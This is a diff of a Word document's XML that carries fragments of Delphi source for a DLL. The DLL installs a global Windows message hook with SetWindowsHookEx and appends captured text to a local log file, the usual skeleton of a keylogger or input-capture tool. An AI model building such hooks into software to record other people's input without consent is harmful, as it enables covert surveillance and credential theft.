-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      LogText := LogText + buf;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // open the log file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      FileName := 'c:\log.txt'; // your log filename here</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      AssignFile(FF, FileName);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      if FileExists(FileName) then Append(FF)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      else Rewrite(FF);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // write to the log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      WriteLn(FF, LogText);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // close the log file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      CloseFile(FF);</w:t>
+        <w:br/>
+        <w:t>    // set the hook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    TheHookHandle := SetWindowsHookEx(WH_GETMESSAGE, @TheHookProc, hInstance, 0);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>procedure StopTheHook; stdcall;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (TheHookHandle &lt;&gt; 0) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    // Remove our hook and clear our hook handle</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    if (UnhookWindowsHookEx(TheHookHandle) &lt;&gt; FALSE) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      TheHookHandle := 0;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -887,6 +1057,12 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
         <w:t>  end;</w:t>
       </w:r>
       <w:r>
@@ -894,27 +1070,6 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
-        <w:t>  {Call the next hook in the hook chain}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  if (Code &lt; 0) then</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
         <w:t>end;</w:t>
       </w:r>
       <w:r>
@@ -928,142 +1083,6 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
-        <w:t>procedure StartTheHook; stdcall;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  if (TheHookHandle = 0) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    // set the hook</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    TheHookHandle := SetWindowsHookEx(WH_GETMESSAGE, @TheHookProc, hInstance, 0);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>procedure StopTheHook; stdcall;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  if (TheHookHandle &lt;&gt; 0) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    // Remove our hook and clear our hook handle</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    if (UnhookWindowsHookEx(TheHookHandle) &lt;&gt; FALSE) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      TheHookHandle := 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
         <w:t>exports</w:t>
       </w:r>
       <w:r>
@@ -1071,12 +1090,6 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>  StartTheHook,</w:t>
       </w:r>
       <w:r>
